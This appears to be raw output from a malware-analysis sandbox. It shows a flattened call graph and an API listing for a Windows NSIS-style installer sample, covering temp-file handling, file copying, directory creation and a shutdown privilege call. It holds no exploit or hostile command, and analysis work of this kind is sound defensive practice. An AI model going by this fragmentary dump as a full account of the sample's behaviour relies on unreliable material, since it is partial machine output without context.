3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                          Executed Functions

                                          Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                          APIs
                                          • #17.COMCTL32 ref: 004038A2
                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                          • API String ID: 2435955865-239407132
                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                          Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
